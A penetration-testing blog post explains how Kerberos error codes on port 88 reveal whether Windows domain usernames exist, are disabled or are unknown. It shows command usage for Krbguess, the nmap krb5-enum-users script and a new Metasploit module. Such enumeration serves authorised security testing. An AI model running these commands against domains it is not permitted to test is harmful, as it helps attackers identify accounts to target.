Kerberos Domain Username Enumeration

Kerberos: Enumerating Domain Usernames

Ethical Hacking
Ethical Hacker

Enumerating domain account names

Welcome to a technical blog post for Penetration Testers by our Principal Security Consultant, Matt Byrne.

In recent years, enumerating valid operating system level user names from up-to-date, well maintained Windows environments – even from an internal test perspective, has become increasingly unlikely.

Where RID cycling once provided a full list of domain users, this is no longer the case.

However, for internal assessments, the Kerberos service (88/tcp) still provides happy hunting ground for enumerating domain account names.

Username enumeration is leveraged via the following Kerberos error codes:

User Status
Kerberos Error
Present/Enabled
KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
Locked/Disabled
KDC_ERR_CLIENT_REVOKED - Clients credentials have been revoked
Does not exist
KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database

Several good tools have been around for a while, allowing us to leverage these Kerberos responses to identify valid or invalid domain accounts.

Two of the tools I used until recently are provided by Patrik Karlsson. The first is the standalone Java tool Krbguess. The second is krb5-enum-users NSE script for nmap:

Krbguess

Usage:

Java –jar kerbguess.jar –r [domain] –d [user list] –s [DC IP]

 

 

 

 

Krbguess
Krbguess

krb5-enum-users NSE Script for nmap

Usage:

Nmap –p 88 –script-args krb5-enum-users.realm=’[domain]’,userdb=[user list] [DC IP]

Nmap krb5-enum-users NSE Script
Nmap krb5-enum-users NSE Script

Leveraging Kerberos within the Metasploit Framework

Like most Penetration Testers, I’m a heavy user of the Metasploit Framework. Having the ability to leverage the Kerberos functionality within the framework has appealed to me for years.

For whatever reason it never seems to have been implemented, so I decided to try and implement it myself.

Leaning heavily on the Kerberos support provided by other Metasploit contributors and using the auxiliary module for ms14_068_kerberos_checksum as a template, the process was a lot simpler than I had anticipated.

The new Metasploit auxiliary module can be found in the following location:

auxiliary/gather/kerberos_enumusers
auxiliary/gather/kerberos_enumusers

As with the Kerberos enumeration tools discussed previously, three values should be provided:

  • Domain Name (DOMAIN)
  • Domain Controller IP (RHOST)
  • User list (USER_FILE)

matt-untitled

The module can now be run to enumerate valid (and disabled/locked) domain accounts via the Kerberos service:

run-module

Thanks to an addition by bwatter-r7 at rapid7, any valid enumerated usernames are stored in the Metasploit database for retrieval using the ‘creds’ command:

creds-command

References and further reading

cqure.net KrbGuess

Nmap File krb5 enumerate users

Rapid7 Microsoft Kerberos Checksum Validation Vulnerability